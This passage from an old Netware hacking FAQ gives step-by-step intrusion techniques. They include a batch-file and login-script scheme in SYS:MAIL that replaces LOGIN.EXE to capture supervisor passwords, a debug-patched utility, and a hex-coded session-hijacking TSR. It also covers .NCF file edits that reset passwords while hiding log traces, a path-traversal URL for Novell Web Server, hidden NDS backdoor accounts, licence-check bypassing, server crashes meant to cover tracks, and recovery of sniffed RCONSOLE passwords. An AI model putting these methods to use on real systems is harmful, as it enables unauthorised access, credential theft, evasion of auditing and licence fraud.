Yes and no. In version 3.x, the Supe password always works. A common mistake regarding 3.x RCONSOLE passwords is to use a switch to use only the Supervisor password. It works like this: LOAD REMOTE /P= instead of LOAD REMOTE RCONPASSWORD The admin believes /P= turns off everything except the Supe password for RCONSOLE. In fact the password is just set to /P= which will get you in! The second most common mistake is using -S, and the third is "". Version 4.1 is a bit different. Here's how it works: - At the console prompt, type LOAD REMOTE SECRET where SECRET is the Remote Console password. - Now type REMOTE ENCRYPT. You will be prompted for a password to encrypt. - This will give you the encrypted version of the password, and give you the option of writing LDREMOTE.NCF to the SYS:SYSTEM directory, containing all the entries for loading Remote Console support. - You can call LDREMOTE from your AUTOEXEC.NCF, or you can change the LOAD REMOTE line in the AUTOEXEC.NCF as follows: LOAD REMOTE SECRET becomes LOAD REMOTE -E 870B7E366363 Another note - to ensure that Supervisor's password will work with RCONSOLE (Netware 4.02 or higher), add the hidden -US switch: LOAD REMOTE -E 870B7E366363 -US Another undocumented switch is -NP which is No Password! --------------------------------------------------------------------------- 04-3. How can I get around a locked MONITOR? There is a simple and easy way to do this in 3.11 if you have a print server running on the file server. The following exploits a bug in 3.11: - Use pconsole to down the print server. This causes the monitor screen to go to the print server screen and wait for you to press enter to exit the screen. At the same time it puts the monitor screen in the background. - Switch to the console screen and type UNLOAD MONITOR. - Check the AUTOEXEC.NCF for the PSERVER.NLM load line and manually reload the PSERVER.NLM. For both Netware 3.x and 4.x, try the debug disable steps in section 02-6. You can type any password in to unlock the console, besides disabling 3.x password protection altogether. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 05 File and Directory Access --------------------------------------------------------------------------- 05-1. How can I see hidden files and directories? Instead of a normal DIR command, use NDIR to see hidden files and directories. NDIR *.* /S /H will show you just Hidden and System files. --------------------------------------------------------------------------- 05-2. How do I defeat the execute-only flag? If a file is flagged as execute-only, it can still be opened. Open the file with a program that will read in executables, and do a Save As to another location. Also try X-AWAY.EXE to remove this flag since Novell's FLAG.EXE won't. But once again X-AWAY.EXE requires Supervisor access. To disable the check for Supe access in X-AWAY, try the following: REN X-AWAY.EXE WORK DEBUG WORK EB84 EB W Q REN WORK X-AWAY.EXE Hey presto, anybody can copy X flagged files. The only catch is you need practically full rights in the directory where the X flagged file resides. --------------------------------------------------------------------------- 05-3. How can I hide my presence after altering files? The best way is to use Filer. Here are the steps for removing file alterations - - Run Filer or use NDIR and note the attributes of the target file, namely the date and owner of the file. - Make your changes or access the file. - Run Filer or use NDIR and check to see if the attributes have changed. If so, change them back to the original settings. While you can hit F1 will in Filer and get all the context-sensitive help you need, the quicky way to get where you're going is to run Filer in the target file's directory, select Directory Contents, highlight the target file and hit enter, select File Options and then View/Set File Information. View and edit to your heart's desire. --------------------------------------------------------------------------- 05-4. What is a Netware-aware trojan? A Netware-aware trojan is a program that supposedly does one thing but does another instead, and does it using Netware API calls. I have never personally encountered one, but here is how they would work. - Trojan program is placed on a workstation, hopefully on one frequented by admins with Supe rights. The trojan program could be named something like CHKVOL.COM or VOLINFO.COM, that is a real name but with a .COM extension. They would be placed in the workstation's path. - Once executed, the trojan uses API calls to determine if the person is logged in as a Supe equivalent, if not it goes to the next step. Otherwise some type of action to breach security is performed. - The real CHKVOL.EXE or VOLINFO.EXE is ran. The breach of security would typically be some type of command-line activity that could be performed by system() calls. For example, PROP.EXE could be run to build a property and the replacement LOGIN.EXE copied up to the server in the SYS:LOGIN directory. Or RW access granted to the SYS:SYSTEM directory for a non-Supe user like GUEST. Once activated the trojan could also erase itself since it is no longer needed. --------------------------------------------------------------------------- 05-5. What are Trustee Directory Assignments? The LAN God has pointed out quite correctly that Trustee Directory Assignments are the most misunderstood and misconfigured portion of Novell Netware. Typically a secure site should have Read and File Scan only in most directories, and should not have any rights on the root directory of any volume. Rights assigned via the Trustee Directory Assignments filter down the directory tree, so if a user has Write access at the root directory, that user has Write access in every subdirectory below it (unless explicitly limited in a subdirectory down stream). And these assignments are not located in the bindery, but on each volume. The following is a brief description of Trustees and Trustee Directory Assignments cut and pasted from the comp.os.netware.security FAQ: [quote] A trustee is any user or group that has been granted access rights in a directory. The access rights in Novell NetWare 2 are slightly different from the ones in NetWare 3. The following is a summary of access rights for NetWare 3. S - Supervisory. Any user with supervisory rights in a directory will automatically inherit all other rights, regardless of whether they have been explicitly granted or not. Supervisor equivalent accounts will hold this access right in every directory. R - Read. Enables users to read files. C - Create. Enables users to create files and directories. Unless they also have write access, they will not be able to edit files which have been created. W - Write. Enables users to make changes to files. Unless they also have create access, they may not be able to edit files, since the write operation can only be used to extend files (not truncate them, which file editors need to do). E - Erase. Enable users to erase files and remove directories. M - Modify. Enable users to modify file attributes. F - File scan. Enables users to see file and directory information. If a user does not have file scan rights, they will not see any evidence of such files existing. A - Access control. Enable user to change trustee rights. They will be able to add other users as trustees, remove trustees, and grant/revoke specific rights from users. The only caveat of access control is that it is possible for users to remove themselves (as trustees) from directories, thus losing all access control. In addition to trustees and access rights, there is a concept of inherited rights which means that users inherit rights from parent directories. For example, if user ALICE has rights [CWEM] in a directory, and she has [RF] rights in the parent directory then she will have [RCWEMF] rights as a result of the inherited rights. This will only work if one of the rights that ALICE has in the two directories is granted to a group; if both are granted to her, she will lose the rights of the parent. [end quote] --------------------------------------------------------------------------- 05-6. Are there any default Trustee Assignments that can be exploited? Two ways. In 3.x the group EVERYONE has Create rights in SYS:MAIL. This means the user (including GUEST) has the ability to write files to any subdirectory in SYS:MAIL. The first versions of Netware included a simple e-mail package, and every user that is created gets a subdirectory in mail with RCWEMF, named after their object ID number. One consistent number is the number 1, which is always assigned to Supervisor. Here's one way to exploit it: - Login as GUEST and change to the SYS:MAIL subdirectory. - Type DIR. You will see one subdirectory, the one owned by GUEST. Change into that directory (ex. here is C0003043) - Type DIR. If there is no file named LOGIN, you can bet there may not be one for Supervisor. If there is a default-looking LOGIN file, even a zero length file, you cannot proceed. - Copy PROP.EXE and LOGIN.EXE (the itsme version) to SYS:MAIL\C0003043 - Create a batch file (ex. here is BOMB.BAT) with the following entries: @ECHO OFF FLAG \LOGIN\LOGIN.EXE N > NUL COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL FLAG \LOGIN\LOGIN.EXE SRO > NUL \MAIL\C0003043\PROP -C > NUL - Create a LOGIN file with the following entries: MAP DISPLAY OFF MAP ERRORS OFF MAP G:=SYS: DRIVE G: COMMAND /C #\MAIL\1\BOMB DRIVE F: MAP DELETE G: - Now copy the files to the Supervisor's SYS:MAIL directory from a drive mapped to the SYS: volume. TYPE BOMB.BAT > \MAIL\1\BOMB.BAT TYPE LOGIN > \MAIL\1\LOGIN - The next time the Supervisor logs in the LOGIN.EXE is replaced and the PROP.EXE file is run, capturing passwords. Run PROP.EXE later to get the passwords, and then once you have all the passwords you need (including Supervisor) delete your LOGIN and BOMB.BAT file. Admins can defeat this by creating default personal Login Scripts or by adding an EXIT command to the end of the System Login Script. Later versions of Netware create a zero-length LOGIN file at ID creation time in the SYS:MAIL directories to defeat this. Pegasus mail has a hole that ties into the Create rights in SYS:MAIL. Here's how to use it: - Create a RULES.PMQ file that sets up a rule to execute a file after receipt of a mail message. The program Run line should be something like: COMMAND /C F:\MAIL\1\BOMB.BAT - Let's say your mail directory is SYS:MAIL\C0003043. Copy PROP.EXE and LOGIN.EXE (the itsme version) to that directory. - Your BOMB.BAT file should be like this: @ECHO OFF FLAG \LOGIN\LOGIN.EXE N > NUL COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL FLAG \LOGIN\LOGIN.EXE SRO > NUL \MAIL\C0003043\PROP -C > NUL - When the Supe reads his mail, the replacement LOGIN.EXE is active and capturing passwords. After acquiring a Supe equiv account, delete the rogue files from SYS:MAIL\1 This Pegasus mail problem will only work if the RULES.PMQ does not exist in the target directory. --------------------------------------------------------------------------- 05-7. What are some general ways to exploit Trustee Rights? To find out all your trustee rights, use the WHOAMI /R command. The following section is a summary of what rights to expect, and the purpose. Where x appears, it means it doesn't matter if the right is set. [SRWCEMFA] means you have FULL rights. They are all eight of the effective rights flags. [Sxxxxxxx] shouldn't appear unless you are supervisor (or equivalent). It means you have full access in that directory and all subdirectories. You cannot be excluded from any directory, even if a user explicitly tries to revoke your access in a subdirectory. [xxxxxxxA] is next best thing to the S right. It means you have access control in that directory and all subdirectories. You can have your access control (along with any other rights) revoked in a subdirectory, but you can always use inherited rights to recover them (see the c.o.n.s FAQ). [ R F ] is what users should have in directories containing software. You have the right to read files only. [ RCWEMFx] is what users should have in their home directory. You can read, create, and edit files. If you find any unusual directories with these rights, they can also be used for storing files (maybe an abuse of the network, especially if this is exploited to avoid quota systems). [ RxW F ] usually means that the directory is used for keeping log files. Unless you have the C right, it may not be possible to edit files in this directory. The RIGHTS commands tells you what rights you have in a particular directory. GRANT, REVOKE, and REMOVE are used to set trustee rights. --------------------------------------------------------------------------- 05-8. Can access to .NCF files help me? Access to any .NCF file can bypass security, as these files are traditionally run from the console and assume the security access of the console. The addition of a few lines to any .NCF file can get you access to that system. The most vulnerable file would be the AUTOEXEC.NCF file. Adding a couple of lines to run BURGLAR.NLM or SETPWD.NLM would certainly get you access. But remember there are other .NCF files that can be used and exploited. For example, ASTART.NCF and ASTOP.NCF are used to start and stop Arcserve, the most popular backup system for Netware. The LDREMOTE.NCF as mentioned in section 04-2 is another potential target. The lines you might add to such a file might be as follows: UNLOAD CONLOG LOAD SETPWD SUPERVISOR SECRET CLS LOAD CONLOG This assumes you had read/write access to the location of the .NCF file and can copy SETPWD.NLM to the server. Note that by unloading CONLOG you are only partially covering your tracks, in the CONSOLE.LOG file it will be obvious that CONLOG was unloaded and reloaded. The CLS is to keep your activities off of the server's screen. The best .NCF for this is obviously one that is either used during the server's boot process or during some automated process. This way a short .NCF and its activities may escape the eyes of an admin during execution. --------------------------------------------------------------------------- 05-9. Can someone think they've logged out and I walk up and take over? Yes. Here's how - Type the following commands at the DOS prompt (or rip them out of this file, and feed them into DOS debug). debug boo.com e100 eb 2b 80 fc d7 74 22 3d 02 f1 74 1d 3d 19 f2 74 e110 18 3d 17 f2 74 0a 3d 17 f2 74 05 ea 5b 46 4d 5d e120 50 b0 d2 38 45 02 58 75 f2 f8 ca 02 00 b4 49 8e e130 06 2c 00 cd 21 b8 21 35 cd 21 89 1e 1c 01 8c 06 e140 1e 01 b8 21 25 ba 02 01 cd 21 ba 2d 01 cd 27 00 rcx 50 w q Just run it on a workstation running NetWare 2.x or 3.x, and wait for someone to login, use the machine, logout, and walk away. Oops. They forgot to logout? Now, isn't that just *bad* luck... Moral: If you are using a public network (such as a school or university), don't just use LOGOUT. Switch the machine OFF. --------------------------------------------------------------------------- 05-10. What other Novell and third party programs have holes that give "too much access"? Netware NFS has several bugs (see Section 07-6). Novell's Web Server has a HUGE bug. The CGI scripts are Basic programs (yes you are about to hack a server using Basic!) and several are included with the server. One in particular, CONVERT.BAS, takes a file and converts it to HTML and then sends it to the user. Here's an example for www.target.com: http://www.target.com/scripts/convert.bas?readme.txt The README.TXT file is returned as HTML. Now here's the bug: http://www.target.com/scripts/convert.bas?../../any_file_on_sys_volume Nasty, huh? I recommend "../../system/autoexec.ncf", or "../../etc/ldremote.ncf". It can also be useful for other things (see 06-2 for an example. --------------------------------------------------------------------------- 05-11. How can I get around disk space requirements? Some admins forget to implement disk space restrictions on some volumes, but give write access to everyone. This allows you to use more resources than the supe intended. Some systems keep user's home directories on one volume, and only restrict disk space on that one volume. Applications and system files will be kept on other volumes. Since some applications require write access to their directories, if the volume space is not limited, any user capable of running the program can use the extra disk space available (an e-mail program like Microsoft Mail on it's own volume leaps to mind). If space isn't limited on SYS, on 3.x there is the SYS:MAIL\xxxxxxxx directory (where xxxxxxxx is your bindery object ID), but this is not there by default in 4.x. However if Pegasus mail is being used, or if the server was migrated from 3.x to 4.x, the directory structure and access may be the same. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 06 Fun with Netware 4.1 --------------------------------------------------------------------------- 06-1. What is interesting about Netware 4.x's licensing? It is possible to load multiple licenses and combine their total number of users. For example, if you are in one of those Novell CNE classes where they give you a 2 user 4.1 license, you can get everyone's CD in class and combine them on one server. If you get 10 CDs you have a 20 user license. I know of no limit to the maximum number of licenses and user limit, except for hardware limitations supporting it. This means you could load more than one copy of 1000 user Netware 4.1 on a server (assuming you have unique copies, not the same copy twice). itsme has done some poking around with his tools, and has the following to say regarding the SERVER.EXE that comes with Netware 4: what's inside server.exe: 0001d7c7 server.nlm type=07 000d319d "Link" 000d504a 000d31a5 unicode.nlm type=00 (ordinary NLM) 000d504a "Link" 000d6e9c 000d5052 dsloader.nlm type=00 (ordinary NLM) 000d6e9c "Link" 000db808 000d6ea4 timesync.nlm type=00 (ordinary NLM) 000db808 polimgr.nlm type=0c ('hidden' NLM) by editing the binary of server, and changing the type of polimgr.nlm from 0c to 00 (offset 007a or 000db882 in server.exe) it becomes unhidden. hidden NLM's are protected from debugging with the netware debugger. polimgr.nlm manages the license files, after it reads the file, it checks with somekind of signature function whether it is a valid file the function doing the checking can be made to always return OK, then you can create an any number of users license. --------------------------------------------------------------------------- 06-2. How can I tell if something is being Audited? Use RCONSOLE and do a directory scan of SYS:_NETWARE. There will be some binary files named NET$AUDT.* if Auditing has been used. Old Audit files will be named NET$AUDT.AO0, .AO1, etc. A current Auditing file will be named NET$AUDT.CAF. If these files do not exist, no Auditing is being or has been done. To check to see if Auditing is currently active, try to open the current Auditing file like this: LOAD EDIT SYS:_NETWARE\NET$AUDT.CAF If it pulls up something (with a little garbage) then Auditing is currently turned off. If you get an error stating that NET$AUDT.CAF doesn't exist and do you wish to create it, that means the file is being hend open and Auditing is currently active on SOMETHING (remember, the EDIT.NLM normally handles open files pretty well, but trying to open a file already open in SYS:_NETWARE always gets this error). Also, if the site is running Novell's Web Server software, use a web browser and try http://www.target.com/scripts/convert.bas?../../_netware/net$audt.caf and if you DO NOT receive an error, Auditing is or was active. See section 05-10 for details on this bug. --------------------------------------------------------------------------- 06-3. Where are the Login Scripts stored and can I edit them? The Login Scripts are stored in, you guessed it, SYS:_NETWARE. Unlike the binary files used in NDS, these files are completely editable by using EDIT.NLM. Doing an RCONSOLE directory scan in SYS:_NETWARE will turn up files with extensions like .000, these are probably Login Scripts. Pull up a few, they are plain text files. For example, you found 00021440.000: LOAD EDIT SYS:_NETWARE\00021440.000 If it is a Login Script, you will see it in plain english and you can certainly edit and save it. This completely bypasses NDS security, and is the main weakness. You can use this to grant a user extra rights that can lead to a number of compromises, including full access to the file system of any server in the tree. --------------------------------------------------------------------------- 06-4. What is the rumored "backdoor" in NDS? The rumored backdoor in NDS exists - to an extent. The rumor is that there is a way to set up a backdoor into a system in NDS that is completely hidden from everyone and everything. There IS a way to get real close to this, although how "hidden" it is remains to be seen. One catch - you need full access to NDS i.e. Admin access to set it up. But if you can get Admin's password or access to a user with Admin or equivalent access then you can put in a backdoor that may go unnoticed for months, or perhaps never be discovered. Here's how to set it up: - Get logged in as Admin or equivalent. - In NWADMIN highlight an existing container. - Create a new container inside this container. - Create a user inside this new container. No home directory. - Give this user full Trustee Rights to their own user object. - Give this user full Trustee Rights to the new container. - Make this user security equivalent to Admin. - Modify the ACL for the new user so they can't be seen. - Adjust the Inherit Rights Filter on the new container so no one can see it. Now this technique can be used by the paranoid admin that wants to give another user full access to a container, and this user wants to restrict access to this container. To prevent this user from forgetting their password (and making a section of the tree unmanageable or worse, disappear) an admin will use similiar techniques. I have not been able to fully test this but it looks completely invisible to the average LAN admin. This does require an above average knowledge of NDS to set up, so most administrators will not even know how to look for this user. Let's say you installed your backdoor at the XYZ Company, put your container inside the MIS container and called it BADBOY. Your backdoor is named BACKDOOR. Login like this: LOGIN .BACKDOOR.BADBOY.MIS.XYZ Now you will show up in the normal tools that show active connections on a server, so naming your backdoor "BACKDOOR" is probably not a great idea. Think of a name that might look like an automated attachment, and only use it when you think you won't be noticed. If the site has Kane Security Analyst, they can find the backdoor. --------------------------------------------------------------------------- 06-5. How can I remove NDS? This one is dangerous. This one will get you your Admin account back if you lost the password, and is not for the light-hearted if you plan on actually using NDS afterwards. Do this at a 4.1 console: LOAD INSTALL -DSREMOVE Now in the INSTALL module, go ahead and try to remove NDS. As a part of the process, it will ask you for the Admin password, get this, JUST MAKE ONE UP. If you get errors, no problem. Keep going and you can remove NDS from the server. Even though you gave it the wrong password, it will still let you remove NDS. I told you this one is real wicked... --------------------------------------------------------------------------- 06-6. How can I remove Auditing if I lost the Audit password? If the Auditor forgets the password, try a simple wipe and reload. Hello, hello, you seemed to have fainted... You can try this although there is no guarantee it will work, it is just a theory. You see, the Auditing files are located in SYS:_NETWARE. As long as they are there and Auditing active, even deleting NDS and recreating it will not turn off Auditing. If you wish you can delete and rebuild SYS: which will get it. Try these listed items if you are desperate. I have tried them in the Nomad Mobile Reseach Centre lab and got this to work a couple of times -- but once I trashed the server and NDS. One time it didn't work at all. But here it is: - Use RCONSOLE's directory scan and get the exact names of the Audit files, you know NET$AUDT.CAF but also files with an extension of .$AF are Auditing files, too. - Use the techniques in 06-2 and determine exactly which files are being held open by this particular server for Auditing. - Try booting up the server and running a sector editor. - Search the drive for the file names you found. - Change all occurrences of these names, save changes, and boot up. - If that didn't do the trick, try booting up the server using a 3.x SERVER.EXE and try and get to SYS:_NETWARE that way. Then delete the Auditing files. - If THAT doesn't work, use repeated calls to the SYS:_NETWARE's directory table (using the APIs) and either delete or change the afore mentioned files. Gee, maybe a "simple wipe and reload" is easier... --------------------------------------------------------------------------- 06-7. Does 4.x store the LOGIN password to a temporary file? Yes and no. No to 4.02 or higher. Here's the scoop on 4.0. The version of LOGIN.EXE that shipped with 4.0 had a flaw that under the right conditions the account and password could be written to a swap file created by LOGIN.EXE. Once this occured, the file could be unerased and the account and password retrieved in plain text. --------------------------------------------------------------------------- 06-8. Everyone can make themselves equivalent to anyone including Admin. How? A couple of things might cause this. One, I'd check the rights for [PUBLIC], and secondly I'd check the USER_TEMPLATE id for excessive rights. The Write right to the ACL will allow you to do some interesting things, including making yourself Admin equivalent. For gaining equivalence to most anything else you need only Read and Compare. The implication should be obvious, but I'll spell it out anyway. A backdoor can be made if an account is set up this way. Let's say you've created an account called TEST that has enough rights to do this kind of thing. Simply go in as the TEST account, make yourself Admin equivalent, do your thing, remove the Admin equivalent, and get the hell out. Neat and sweet. --------------------------------------------------------------------------- 06-9. Can I reset an NDS password with just limited rights? There is a freeware utility called N4PASS, that is meant for Netware 4.10 (uses NDS calls and is not bindery based). The intention of this package is to enable a Help Desk to reset passwords for users without granting them tons of rights. It uses full logging and does not require massive ACL manipulation to do it. Obviously being set up to use this utility opens a few doors. The filename is N4PA12.EXE, and can be retrieved from the author's web site at http://fastlane.net/homepages/dcollins and the author can be reached at dcollins@fastlane.net. A couple of interesting things about this utility -- if configured incorrectly the server may be compromised in a number of ways. For instance, the password generated is a calculation that uses a 'temp filename', the date, the user's loginname, helpdesk login name, seed value, and a few other items. (its in the n4pass.txt file) N4PASS is not set to purge immediately, the file is salvagable. Also, if the rights to the N4PASS directory are too open, you can discover the default password, among other things. The text file included with the utility covers this, so read it carefully if you are installing it. If you are hacking, read it carefully too ;-) It is critical that access to the sys:\n4pass\password is secure since any 'temp file' (.1st extension) can cause the 'password reset' for the person listed in the 'temp file'. --------------------------------------------------------------------------- 06-10. What is OS2NT.NLM? OS2NT.NLM is a Novell-supplied NLM for recovering/fixing Admin, like after it becomes an Unknown object, as opposed to User -- especially after a DSREPAIR. This module is considered a "last resort" NLM and you must contact Novell to use it. While I haven't seen it, it is supposed to be on one of Novell's FTP sites. It supposedly is customized by Novell to work with your serial number and is a one-time use NLM. You have to prove to Novell who you are and that your copy of Netware is registered. I would suspected it is possible that this NLM could be hacked to get around the one-time use and serial number/password thing, but a restore of NDS from a good backup would accomplish things better. This way is a little destructive. --------------------------------------------------------------------------- 06-11. Do you have to be Admin equivalent to reset a password? No. There is a freeware utility called N4PASS, that is meant for Netware 4.10 (uses NDS calls and is not bindery based). The intent is for helpdesk staff to reset passwords for users without setting up elaborate ACL settings for a group to control the password property. It supposedly does this with full logging. I'm looking for info on it, so let me know if you have tips on its use. --------------------------------------------------------------------------- 06-12. What if I can't see SYS:_NETWARE? A number of people have sent me information regarding this, it seems if Novell's 410pt3 patch is applied you can no longer see the _NETWARE directory. This is hardly surprising as the ability to look into this directory has become increasingly difficult. If you are an administrator you'd probably want to load this patch. If you're a hacker -- don't dispare. Most administrators are real slow in updating their systems ;-) --------------------------------------------------------------------------- 06-13. What are security considerations regarding partitions of the tree? Most of this is covered as individual items, but here is a bit regarding partitioning of the tree. As mentioned in section 02-6, you can set the bindery context of a server to help you recover a lost ADMIN password. It should be noted that you can only access containers in the current servers partition. With larger networks things get more complex. For example, a "supervisor" account (one with full access to the file system) may have limited access on another server. The number of possible leaks for intruders grows with the size of the network. A hacker could exploit this and gain control of other partitions, if any object in the first partition they have compromised has access rights to other directory partitions. Intruders could easily give themselves security equivalence to that object, or change that objects password with SYSCON, then login as that object and access the other partitions. In other words, if a read/write or master partition is stored on one server, its supervisor can potentially manage all objects in this partition, and since its supervisor's password can be reset from the console, other partitions are at risk. Read/only replicas of partitions by nature will not allow you to set your bindery context to a container in that area -- they are, duh, read only. Of course the brave can disconnect the server from the network, and run DSREPAIR on that server to change the partition to master, but that's rather extreme. Novell recommends trying to restrict object rights to their own partition and to create replica partitions only on trusted server. Let's use an example to illustrate: - Server ACCOUNTING has lots of spreadsheets, documents, and a database used by the accounting department with all kinds of information. The container ACCT-USERS has the IRF set so that they manage themselves. - There is an account called MAINTENANCE in the ACCT-USERS container that the manager of accounting can reset the password. This is done when the LAN administrators need to perform any kind of maintenance, such as building IDs with tricky access rights, etc. that the accounting manager doesn't know how to do. - A read/write replica of the partition containing the ACCT-USERS container exists on a server across town in a small sales office. A temporary office clerk hired from a local temp agency has access to the storage closet where this server is kept. - One afternoon the temporary uses SETPWD.NLM and resets the MAINTENANCE account password. - The next day (after replication) the temporary rifles through all accounting documents which include payroll and personal information, sales forecasts, future plans for capital expenditure, etc. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 07 Miscellaneous Info on Netware --------------------------------------------------------------------------- 07-1. Why can't I get through the 3.x server to another network via TCP/IP? Loading the TCPIP.NLM in a server with two cards does not mean that packets will be forwarded from one card to another. For packet forwarding to work, the AUTOEXEC.NCF file should have the line: load tcpip forward=yes For packets to go through the server, you must set up a "gateway=aa.bb.cc.dd" option on the workstation. This leaves routing up to the server. If you are writing hack tools, keep this in mind if they use IP. Some older routers may not recognize the Netware server as a router, so you may not have many options if your target is on the other side of one of these routers. Newer routers are Netware aware and will "find" your server as a router through RIP. Netware 3.11 IP will only forward between two different subnets. Proxy Arp is currently not supported in Netware IP. Example: 123.45.6 & 123.45.7 with a mask of ff.ff.ff.00 will forward packets 123.45.6 & 231.45.7 with a mask of ff.ff.ff.00 will not This way you do not waste precious time trying to cross an uncrossable river. Some admins use this to limit the flow of IP traffic. --------------------------------------------------------------------------- 07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF? For Netware 3.xx, use these command-line options: SERVER -NS to skip STARTUP.NCF, and SERVER -NA to skip AUTOEXEC.NCF NetWare 2.x does not HAVE the files STARTUP.NCF and AUTOEXEC.NCF. Instead they hard-code all the information into NET$OS.EXE, so you will have to rebuild it to change anything. --------------------------------------------------------------------------- 07-3. How can I login without running the System Login Script? Often an admin will try and prevent a user from getting to DOS or breaking out of the System Login Script to "control" the user. Here's to way to prevent that - - Use ATTACH instead of LOGIN to connect to a server. ATTACH will not run the login script, whereas LOGIN will. ATTACH.EXE will either have to be copied to a local HD or put in SYS:LOGIN. - Use the /s <fname> option for LOGIN. Using "LOGIN /S NUL <login>" will cause LOGIN to load the DOS device NUL which will always seem like an empty file. --------------------------------------------------------------------------- 07-4. How do I remotely reboot a Netware 3.x file server? If you have access to a server via RCONSOLE it may come in handy after loading or unloading an NLM to reboot a server. Build an NCF file by doing the following steps - - Create a file called DOWNBOY.NCF on your local drive. It should be a text file and contain the following lines: REMOVE DOS DOWN EXIT - Copy up the file to the SYS:SYSTEM directory using RCONSOLE. - At the System Console prompt, type DOWNBOY and enter. What happens is this - the REMOVE DOS statement frees up the DOS section in server RAM, the server is downed (if there are open files, you will be given one of those "are you sure" messages, answer Y for yes), and the EXIT command tries to return the server console to DOS. But since you removed DOS from RAM, the server is warm booted. --------------------------------------------------------------------------- 07-5. How can I abend a Netware server? And why? I'll answer the second question first. You may be testing your server as an administrator and wish to see how you are recovering from crashes. Or you may be a hacker and wish to cover your tracks VERY DRAMATICALLY. After all, if you are editing log files and they are going to look funny when you are done, a good crash might explain why things look so odd in the logs. These are per itsme: - Netware 4.1 : type 512 chars on the console + NENTER -> abend - Netware 3.11 : NCP request 0x17-subfn 0xeb with a connection number higher than the maximum allowed will crash the server (yes you will need the APIs) If you have console access, try this: - At the server console type UNLOAD RENDIRFIX - Use your local copy of SYS:PUBLIC/RENDIR.EXE - In SYS:LOGIN type RENDIR <alt 174> <alt 174> (login not required, just attaching to the server) --------------------------------------------------------------------------- 07-6. What is Netware NFS and is it secure? NFS (Networked File System) is used primarily in Unix to remotely mount a different file system. Its primary purpose in Netware is to allow the server to mount a Unix file system as a Netware volume, allowing Netware users access to Unix data without running IP or logging into the server, and Unix users to mount a Netware volume as a remote file system. If the rights are set up incorrectly you can gain access to a server. While the product works as described, it is a little hard to administer, as user accounts on both sides must be in sync (name and password) and it can be a fairly manual process to ensure that they are, unless the versions are Netware NFS 2.1 or greater with Netware 4.x AND the Unix side is NOT running NIS. Simply adding the proper UID to the NDS object to create a relationship for rights to be passed back and forth. There are three modes -- Unix is God, Netware is God, or both are right. A reported problem with Netware NFS is that after unloading and reloading using the .NCF files, a system mount from the Unix side includes SYS:ETC read only access. If this directory can be looked at from the Unix side after a mount, .NCF and .CFG files could be viewed and their information exploited. For example, SYS:ETC is a possible location of LDREMOTE.NCF, which could include the RCONSOLE password. On Netware 3.11 if you ask the portmapper for an NFS handle it will give you one. When you give NFS the file handle it will check its LOCAL portmapper and then grant the request. You can then read any file on the mount you just made. Netware NFS' existence on a server says you have some Unix boxes around somewhere, which may be of interest as another potential system to gain access to. --------------------------------------------------------------------------- 07-7. Can sniffing packets help me break in? Yes. If a user is logging in and the password is being transmitted to the server unencrypted, it will show up as plain text in the trace. If the site uses telnet and ftp, capturing those password will come in handy. Outside of gaining access to another system, many users will make their passwords the same across all systems. For a list of DOS-based sniffers, see the alt.2600/#hack FAQ. I personally prefer the Network General Sniffer ;-) RCONSOLE.EXE is the client-launched application that provides a remote server console to a Novell Netware file server. The connection between client and server allows administrators to manage servers as if they were at the physical server console from their desks, and allow virtually any action that would be performed at the server console to be performed remotely, including execution of console commands, uploading of files to the server, and the unloading and loading of Netware Loadable Modules (NLMs). It is not only an effective tool for administrators, it is a prime target for hackers. A critical point of access to many servers is the actual physical console. This is one of the main reasons why physical security of the server is so important and stressed by security conscious administrators. On many systems you have a level of access with little to no security. Netware is no exception. The main reason to hack RCONSOLE is to gain access to the Netware server console. No, you aren't physically there, but the OS doesn't know any different. And the main reason to gain access to the Netware server console is to utilize a tool to gain Supervisor access to the Netware server. During the RCONSOLE process, the password does come across the wire encrypted. If you look at the conversation you will see packets containing the RCONSOLE.EXE being opened, the possible servers to be accessed, etc. This conversation is nothing but NCP packets. Once RCONSOLE is up on the workstation, the user chooses the server, hits enter, and is prompted for a password. After entering the password, the conversation contains two 60 byte IPX/SPX packets going back and forth followed by 4 NCP packets, 64 bytes, 60 bytes, 64 bytes, and 310 bytes in length respectively. The next IPX/SPX packet, 186 bytes in length, contains the password. It is located at offset 3Ah, which is easy to find. Offset 38h is always FE and offset 39h is always FF. Now comes the use of a tool called RCON.EXE from itsme that can take some of the information you have collected and turn it into the password. What you need are the first 8 hex bytes starting at offset 3Ah, the network address, and the node address. Now the network and node address are in the header of the packet that contains the encrypted password, but can also get these by typing USERLIST /A which returns this info (and more) for each person logged in. Now why just the first 8 hex bytes? That's all Novell uses. Great encryption scheme, huh? --------------------------------------------------------------------------- 07-8. What else can sniffing get me? Jeff Carr has pointed out that RCONSOLE sends screens in plaintext across the network for all to see (well, all with sniffers). This means you can see what is being typed in and what is happening on the screen. While it is not the prettiest stuff to look at, occassional gems are available. Jeff's best gem? The RCONSOLE password. The server had been brought up without REMOTE and RSPX being loaded, they were loaded by hand at the console after the server was brought up. The first RCONSOLE session brought up the screen with the lines LOAD REMOTE PASSWORD and LOAD RSPX (with PASSWORD being the RCONSOLE password), and this was being sent to the RCONSOLE user's workstation in plaintext. Teiwaz discovered that SYSCON sends password changes in plaintext. While SETPASS, LOGIN, MAP, and ATTACH all encrypt the password in 3.x, SYSCON does not. --------------------------------------------------------------------------- 07-9. How does password encryption work? From itsme - the password encryption works as follows: 1- the workstation requests a session key from the server (NCP-17-17) 2- the server sends a unique 8 byte key to the workstation 3- the workstation encrypts the password with the userid, - this 16 byte value is what is stored in the bindery on the server 4- the WS then encrypts this 16 byte value with the 8 byte session key resulting in 8 bytes, which it sends to the server (NCP-17-18 = login), (NCP-17-4a = verify pw) (NCP-17-4b = change pw) 5- the server performs the same encryption, and compares its own result with that sent by the WS -> the information contained in the net$*.old files which can be found in the system directory after bindfix was run, is enough to login to the server as any object. just skip step 3 --------------------------------------------------------------------------- 07-10. Are there products to help improve Netware's security? While there are a number of products, commercial and shareware/public domain that have some security-related features, the following products are either really good or have some unique features. There is a commercial product called SmartPass, which runs as an NLM. Once installed, you can load this and analyze existing passwords for weaknesses. A limited-time free demo can be obtained from the following address: http://www.egsoftware.com/ SmartPass will check passwords on the fly, so a user can be forced to use a non-dictionary word for a password. Another commercial product product that will check from a dictionary word list and simply report if the password is on the list is Bindview 